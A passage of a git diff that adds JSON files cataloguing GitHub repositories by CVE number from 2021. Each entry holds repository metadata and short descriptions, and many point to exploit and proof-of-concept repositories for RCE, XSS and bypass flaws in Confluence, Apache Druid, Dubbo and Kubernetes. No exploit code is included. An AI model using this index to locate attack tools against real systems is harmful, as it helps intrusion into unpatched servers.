Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.", + "fork": false, + "created_at": "2021-04-10T09:23:52Z", + "updated_at": "2024-11-19T13:44:31Z", + "pushed_at": "2024-02-25T02:15:22Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 24, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25461.json b/2021/CVE-2021-25461.json new file mode 100644 index 0000000000..48c1c4e4fa --- /dev/null +++ b/2021/CVE-2021-25461.json @@ -0,0 +1,33 @@ +[ + { + "id": 463240147, + "name": "CVE-2021-25461", + "full_name": "bkojusner\/CVE-2021-25461", + "owner": { + "login": "bkojusner", + "id": 25017260, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25017260?v=4", + "html_url": "https:\/\/github.com\/bkojusner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bkojusner\/CVE-2021-25461", + "description": null, + "fork": false, + "created_at": "2022-02-24T17:28:58Z", + "updated_at": "2022-04-06T05:11:43Z", + "pushed_at": "2022-07-23T16:16:42Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25641.json b/2021/CVE-2021-25641.json new file mode 100644 index 0000000000..952ad86c4c --- /dev/null +++ b/2021/CVE-2021-25641.json @@ -0,0 +1,64 @@ +[ + { + "id": 374287562, + "name": "CVE-2021-25641-Proof-of-Concept", + "full_name": "Dor-Tumarkin\/CVE-2021-25641-Proof-of-Concept", + "owner": { + "login": "Dor-Tumarkin", + "id": 23374015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23374015?v=4", + "html_url": "https:\/\/github.com\/Dor-Tumarkin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dor-Tumarkin\/CVE-2021-25641-Proof-of-Concept", + "description": "Apache\/Alibaba Dubbo <= 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions <= 2.7.6 With Different Gadgets", + "fork": false, + "created_at": "2021-06-06T06:41:36Z", + "updated_at": "2024-08-12T20:13:40Z", + "pushed_at": "2021-06-06T08:41:19Z", + "stargazers_count": 52, + "watchers_count": 52, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 52, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 564175641, + "name": "CVE-2021-25641", + "full_name": "l0n3rs\/CVE-2021-25641", + "owner": { + "login": "l0n3rs", + "id": 31120718, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31120718?v=4", + "html_url": "https:\/\/github.com\/l0n3rs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0n3rs\/CVE-2021-25641", + "description": "A Exploit Tool For CVE-2021-25641.", + "fork": false, + "created_at": "2022-11-10T06:33:54Z", + "updated_at": "2022-11-11T00:45:15Z", + "pushed_at": "2022-11-10T06:48:46Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25642.json b/2021/CVE-2021-25642.json new file mode 100644 index 0000000000..c4cc553821 --- /dev/null +++ b/2021/CVE-2021-25642.json @@ -0,0 +1,33 @@ +[ + { + "id": 529105930, + "name": "CVE-2021-25642", + "full_name": "safe3s\/CVE-2021-25642", + "owner": { + "login": "safe3s", + "id": 108328094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4", + "html_url": "https:\/\/github.com\/safe3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/safe3s\/CVE-2021-25642", + "description": "CVE-2021-25642", + "fork": false, + "created_at": "2022-08-26T03:51:58Z", + "updated_at": "2022-08-26T03:51:58Z", + "pushed_at": "2022-08-26T03:51:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25646.json b/2021/CVE-2021-25646.json new file mode 100644 index 0000000000..f09bb94da4 --- /dev/null +++ b/2021/CVE-2021-25646.json @@ -0,0 +1,256 @@ +[ + { + "id": 335501856, + "name": "cve-2021-25646", + "full_name": "yaunsky\/cve-2021-25646", + "owner": { + "login": "yaunsky", + "id": 48243087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4", + "html_url": "https:\/\/github.com\/yaunsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yaunsky\/cve-2021-25646", + "description": "Apache Druid 远程代码执行;检测脚本", + "fork": false, + "created_at": "2021-02-03T03:59:52Z", + "updated_at": "2023-11-20T12:38:45Z", + "pushed_at": "2021-02-03T06:06:24Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 335533066, + "name": "CVE-2021-25646", + "full_name": "lp008\/CVE-2021-25646", + "owner": { + "login": "lp008", + "id": 11436275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11436275?v=4", + "html_url": "https:\/\/github.com\/lp008", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lp008\/CVE-2021-25646", + "description": null, + "fork": false, + "created_at": "2021-02-03T06:45:54Z", + "updated_at": "2023-04-12T02:14:41Z", + "pushed_at": "2021-02-03T06:53:25Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 335952760, + "name": "CVE-2021-25646-GUI", + "full_name": "Ormicron\/CVE-2021-25646-GUI", + "owner": { + "login": "Ormicron", + "id": 26640179, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26640179?v=4", + "html_url": "https:\/\/github.com\/Ormicron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ormicron\/CVE-2021-25646-GUI", + "description": "CSharp CVE-2021-25646-GUI", + "fork": false, + "created_at": "2021-02-04T12:51:01Z", + "updated_at": "2021-09-09T06:48:52Z", + "pushed_at": "2021-02-05T03:54:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 338562736, + "name": "Apache-Druid-CVE-2021-25646", + "full_name": "Vulnmachines\/Apache-Druid-CVE-2021-25646", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Apache-Druid-CVE-2021-25646", + "description": null, + "fork": false, + "created_at": "2021-02-13T11:48:35Z", + "updated_at": "2024-08-12T20:10:20Z", + "pushed_at": "2021-06-10T17:24:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 346861222, + "name": "PocList", + "full_name": "1n7erface\/PocList", + "owner": { + "login": "1n7erface", + "id": 52184829, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52184829?v=4", + "html_url": "https:\/\/github.com\/1n7erface", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1n7erface\/PocList", + "description": "Alibaba-Nacos-Unauthorized\/ApacheDruid-RCE_CVE-2021-25646\/MS-Exchange-SSRF-CVE-2021-26885\/Oracle-WebLogic-CVE-2021-2109_RCE\/RG-CNVD-2021-14536\/RJ-SSL-VPN-UltraVires\/Redis-Unauthorized-RCE\/TDOA-V11.7-GetOnlineCookie\/VMware-vCenter-GetAnyFile\/yongyou-GRP-U8-XXE\/Oracle-WebLogic-CVE-2020-14883\/Oracle-WebLogic-CVE-2020-14882\/Apache-Solr-GetAnyFile\/F5-BIG-IP-CVE-2021-22986\/Sonicwall-SSL-VPN-RCE\/GitLab-Graphql-CNVD-2021-14193\/D-Link-DCS-CVE-2020-25078\/WLAN-AP-WEA453e-RCE\/360TianQing-Unauthorized\/360TianQing-SQLinjection\/FanWeiOA-V8-SQLinjection\/QiZhiBaoLeiJi-AnyUserLogin\/QiAnXin-WangKangFirewall-RCE\/金山-V8-终端安全系统\/NCCloud-SQLinjection\/ShowDoc-RCE", + "fork": false, + "created_at": "2021-03-11T22:49:17Z", + "updated_at": "2024-11-27T17:40:14Z", + "pushed_at": "2023-05-11T14:36:58Z", + "stargazers_count": 1079, + "watchers_count": 1079, + "has_discussions": false, + "forks_count": 319, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "alibaba-nacos", + "jar", + "poc" + ], + "visibility": "public", + "forks": 319, + "watchers": 1079, + "score": 0, + "subscribers_count": 36 + }, + { + "id": 357955989, + "name": "CVE-2021-25646", + "full_name": "givemefivw\/CVE-2021-25646", + "owner": { + "login": "givemefivw", + "id": 65514141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4", + "html_url": "https:\/\/github.com\/givemefivw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/givemefivw\/CVE-2021-25646", + "description": "CVE-2021-25646 Apache Druid 远程代码执行漏洞 Wker脚本", + "fork": false, + "created_at": "2021-04-14T15:36:04Z", + "updated_at": "2022-05-17T02:20:31Z", + "pushed_at": "2021-04-15T09:55:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 437570654, + "name": "CVE-2021-25646", + "full_name": "j2ekim\/CVE-2021-25646", + "owner": { + "login": "j2ekim", + "id": 33790074, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33790074?v=4", + "html_url": "https:\/\/github.com\/j2ekim", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/j2ekim\/CVE-2021-25646", + "description": "Apache Druid remote code execution vulnerability - Apache Druid 远程代码执行漏洞利用 CVE-2021-25646", + "fork": false, + "created_at": "2021-12-12T14:40:12Z", + "updated_at": "2022-03-23T05:51:41Z", + "pushed_at": "2021-12-12T14:55:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-25646" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 867707278, + "name": "CVE-2021-25646-exp", + "full_name": "luobai8\/CVE-2021-25646-exp", + "owner": { + "login": "luobai8", + "id": 99600256, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99600256?v=4", + "html_url": "https:\/\/github.com\/luobai8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/luobai8\/CVE-2021-25646-exp", + "description": "CVE-2021-25646 Apache Druid 远程代码执行 漏洞检测和利用工具", + "fork": false, + "created_at": "2024-10-04T15:06:37Z", + "updated_at": "2024-10-04T16:38:32Z", + "pushed_at": "2024-10-04T16:38:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25679.json b/2021/CVE-2021-25679.json new file mode 100644 index 0000000000..71ba54e210 --- /dev/null +++ b/2021/CVE-2021-25679.json @@ -0,0 +1,33 @@ +[ + { + "id": 344250257, + "name": "AdTran-Personal-Phone-Manager-Vulns", + "full_name": "3ndG4me\/AdTran-Personal-Phone-Manager-Vulns", + "owner": { + "login": "3ndG4me", + "id": 14339392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14339392?v=4", + "html_url": "https:\/\/github.com\/3ndG4me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3ndG4me\/AdTran-Personal-Phone-Manager-Vulns", + "description": "A repository hosting write ups for the 0 days CVE-2021-25679, CVE-2021-25680, and CVE-2021-25681 ", + "fork": false, + "created_at": "2021-03-03T20:06:54Z", + "updated_at": "2024-08-12T20:10:52Z", + "pushed_at": "2021-04-17T20:03:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25735.json b/2021/CVE-2021-25735.json new file mode 100644 index 0000000000..441229a5e9 --- /dev/null +++ b/2021/CVE-2021-25735.json @@ -0,0 +1,33 @@ +[ + { + "id": 360429516, + "name": "CVE-2021-25735", + "full_name": "darryk10\/CVE-2021-25735", + "owner": { + "login": "darryk10", + "id": 77834235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77834235?v=4", + "html_url": "https:\/\/github.com\/darryk10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darryk10\/CVE-2021-25735", + "description": "Exploit CVE-2021-25735: Kubernetes Validating Admission Webhook Bypass", + "fork": false, + "created_at": "2021-04-22T07:25:31Z", + "updated_at": "2022-11-09T18:12:01Z", + "pushed_at": "2021-04-23T13:11:17Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25741.json b/2021/CVE-2021-25741.json new file mode 100644 index 0000000000..c1783e9599 --- /dev/null +++ b/2021/CVE-2021-25741.json @@ -0,0 +1,64 @@ +[ + { + "id": 449716090, + "name": "CVE-2021-25741", + "full_name": "Betep0k\/CVE-2021-25741", + "owner": { + "login": "Betep0k", + "id": 25924958, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25924958?v=4", + "html_url": "https:\/\/github.com\/Betep0k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Betep0k\/CVE-2021-25741", + "description": "Exploit for CVE-2021-25741 vulnerability", + "fork": false, + "created_at": "2022-01-19T14:05:20Z", + "updated_at": "2024-07-13T00:54:06Z", + "pushed_at": "2022-01-19T19:15:36Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 28, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707080239, + "name": "CVE-2021-25741", + "full_name": "cdxiaodong\/CVE-2021-25741", + "owner": { + "login": "cdxiaodong", + "id": 84082748, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84082748?v=4", + "html_url": "https:\/\/github.com\/cdxiaodong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cdxiaodong\/CVE-2021-25741", + "description": "fork on Betep0k\/CVE-2021-25741\/fork whose images is useless and test on metarget", + "fork": false, + "created_at": "2023-10-19T07:26:11Z", + "updated_at": "2023-10-19T07:31:06Z", + "pushed_at": "2023-10-19T07:35:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25790.json b/2021/CVE-2021-25790.json new file mode 100644 index 0000000000..9527471769 --- /dev/null +++ b/2021/CVE-2021-25790.json @@ -0,0 +1,33 @@ +[ + { + "id": 396769362, + "name": "CVE-2021-25790-Multiple-Stored-XSS", + "full_name": "MrCraniums\/CVE-2021-25790-Multiple-Stored-XSS", + "owner": { + "login": "MrCraniums", + "id": 10303989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10303989?v=4", + "html_url": "https:\/\/github.com\/MrCraniums", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrCraniums\/CVE-2021-25790-Multiple-Stored-XSS", + "description": "CVE-2021-25790-Multiple-Stored-XSS : Multiple Stored XSS in House Rental and Property Listing", + "fork": false, + "created_at": "2021-08-16T11:46:02Z", + "updated_at": "2021-08-16T11:50:43Z", + "pushed_at": "2021-08-16T11:50:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25791.json b/2021/CVE-2021-25791.json new file mode 100644 index 0000000000..d39d6fcf29 --- /dev/null +++ b/2021/CVE-2021-25791.json @@ -0,0 +1,33 @@ +[ + { + "id": 396762359, + "name": "CVE-2021-25791-Multiple-Stored-XSS", + "full_name": "MrCraniums\/CVE-2021-25791-Multiple-Stored-XSS", + "owner": { + "login": "MrCraniums", + "id": 10303989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10303989?v=4", + "html_url": "https:\/\/github.com\/MrCraniums", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrCraniums\/CVE-2021-25791-Multiple-Stored-XSS", + "description": "Multiple Stored XSS Online Doctor Appointment System ", + "fork": false, + "created_at": "2021-08-16T11:25:30Z", + "updated_at": "2021-08-16T11:50:46Z", + "pushed_at": "2021-08-16T11:47:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25801.json b/2021/CVE-2021-25801.json new file mode 100644 index 0000000000..d694d0e5ca --- /dev/null +++ b/2021/CVE-2021-25801.json @@ -0,0 +1,33 @@ +[ + { + "id": 484198736, + "name": "VLC_CVE-2021-25801_Analysis", + "full_name": "DShankle\/VLC_CVE-2021-25801_Analysis", + "owner": { + "login": "DShankle", + "id": 44985044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44985044?v=4", + "html_url": "https:\/\/github.com\/DShankle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DShankle\/VLC_CVE-2021-25801_Analysis", + "description": null, + "fork": false, + "created_at": "2022-04-21T20:41:18Z", + "updated_at": "2022-08-29T17:16:48Z", + "pushed_at": "2022-04-21T21:09:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25804.json b/2021/CVE-2021-25804.json new file mode 100644 index 0000000000..7468181121 --- /dev/null +++ b/2021/CVE-2021-25804.json @@ -0,0 +1,33 @@ +[ + { + "id": 495571729, + "name": "VLC_CVE-2021-25804_Analysis", + "full_name": "DShankle\/VLC_CVE-2021-25804_Analysis", + "owner": { + "login": "DShankle", + "id": 44985044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44985044?v=4", + "html_url": "https:\/\/github.com\/DShankle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DShankle\/VLC_CVE-2021-25804_Analysis", + "description": null, + "fork": false, + "created_at": "2022-05-23T20:58:56Z", + "updated_at": "2022-08-29T17:19:40Z", + "pushed_at": "2022-08-29T17:48:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-25837.json b/2021/CVE-2021-25837.json new file mode 100644 index 0000000000..86a02ce656 --- /dev/null +++ b/2021/CVE-2021-25837.json @@ -0,0 +1,33 @@ +[ + { + "id": 486821585, + "name": "Ethermint-CVE-2021-25837", + "full_name": "iczc\/Ethermint-CVE-2021-25837", + "owner": { + "login": "iczc", + "id": 12002459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12002459?v=4", + "html_url": "https:\/\/github.com\/iczc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iczc\/Ethermint-CVE-2021-25837", + "description": null, + "fork": false, + "created_at": "2022-04-29T03:12:27Z", + "updated_at": "2022-08-17T13:55:40Z", + "pushed_at": "2022-05-05T06:10:24Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-26084.json b/2021/CVE-2021-26084.json new file mode 100644 index 0000000000..e3bbdb8b4b --- /dev/null +++ b/2021/CVE-2021-26084.json @@ -0,0 +1,1218 @@ +[ + { + "id": 401772671, + "name": "CVE-2021-26084", + "full_name": "crowsec-edtech\/CVE-2021-26084", + "owner": { + "login": "crowsec-edtech", + "id": 97851186, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97851186?v=4", + "html_url": "https:\/\/github.com\/crowsec-edtech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crowsec-edtech\/CVE-2021-26084", + "description": "CVE-2021-26084 - Confluence Pre-Auth RCE | OGNL injection ", + "fork": false, + "created_at": "2021-08-31T16:33:32Z", + "updated_at": "2023-11-01T10:16:55Z", + "pushed_at": "2021-09-01T17:56:22Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 21, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 401870801, + "name": "CVE-2021-26084_PoC", + "full_name": "alt3kx\/CVE-2021-26084_PoC", + "owner": { + "login": "alt3kx", + "id": 3140111, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alt3kx\/CVE-2021-26084_PoC", + "description": null, + "fork": false, + "created_at": "2021-08-31T23:33:44Z", + "updated_at": "2024-08-12T20:16:03Z", + "pushed_at": "2021-09-01T01:01:06Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 20, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 20, + "watchers": 54, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 401884408, + "name": "CVE-2021-26084", + "full_name": "dinhbaouit\/CVE-2021-26084", + "owner": { + "login": "dinhbaouit", + "id": 17717385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17717385?v=4", + "html_url": "https:\/\/github.com\/dinhbaouit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinhbaouit\/CVE-2021-26084", + "description": null, + "fork": false, + "created_at": "2021-09-01T00:50:30Z", + "updated_at": "2023-09-05T06:01:20Z", + "pushed_at": "2021-09-01T01:17:58Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 29, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 29, + "watchers": 54, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 401907723, + "name": "CVE-2021-26084", + "full_name": "JKme\/CVE-2021-26084", + "owner": { + "login": "JKme", + "id": 2935865, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2935865?v=4", + "html_url": "https:\/\/github.com\/JKme", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JKme\/CVE-2021-26084", + "description": "CVE-2021-26084 Remote Code Execution on Confluence Servers, reference: https:\/\/github.com\/httpvoid\/writeups\/blob\/main\/Confluence-RCE.md", + "fork": false, + "created_at": "2021-09-01T02:35:04Z", + "updated_at": "2024-04-22T13:37:41Z", + "pushed_at": "2021-09-01T02:34:14Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 401967623, + "name": "CVE-2021-26084_Confluence", + "full_name": "hev0x\/CVE-2021-26084_Confluence", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2021-26084_Confluence", + "description": "Confluence Server Webwork OGNL injection", + "fork": false, + "created_at": "2021-09-01T07:15:17Z", + "updated_at": "2024-09-23T14:04:41Z", + "pushed_at": "2021-12-03T22:09:31Z", + "stargazers_count": 306, + "watchers_count": 306, + "has_discussions": false, + "forks_count": 81, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 81, + "watchers": 306, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 401990251, + "name": "CVE-2021-26084_Confluence", + "full_name": "prettyrecon\/CVE-2021-26084_Confluence", + "owner": { + "login": "prettyrecon", + "id": 79907007, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79907007?v=4", + "html_url": "https:\/\/github.com\/prettyrecon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/prettyrecon\/CVE-2021-26084_Confluence", + "description": "CVE-2021-26084 - Confluence Pre-Auth RCE OGNL injection 回显", + "fork": false, + "created_at": "2021-09-01T08:39:41Z", + "updated_at": "2024-08-12T20:16:04Z", + "pushed_at": "2021-09-01T08:17:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 36, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 402010179, + "name": "CVE-2021-26084", + "full_name": "0xf4n9x\/CVE-2021-26084", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2021-26084", + "description": "CVE-2021-26084 Remote Code Execution on Confluence Servers", + "fork": false, + "created_at": "2021-09-01T09:50:26Z", + "updated_at": "2024-09-23T14:06:28Z", + "pushed_at": "2022-02-10T11:38:46Z", + "stargazers_count": 69, + "watchers_count": 69, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 69, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 402050204, + "name": "Confluence_CVE-2021-26084", + "full_name": "Vulnmachines\/Confluence_CVE-2021-26084", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/Confluence_CVE-2021-26084", + "description": "Remote Code Execution on Confluence Servers : CVE-2021-26084", + "fork": false, + "created_at": "2021-09-01T12:19:53Z", + "updated_at": "2024-08-12T20:16:04Z", + "pushed_at": "2022-07-29T08:01:19Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 402052753, + "name": "westone-CVE-2021-26084-scanner", + "full_name": "Osyanina\/westone-CVE-2021-26084-scanner", + "owner": { 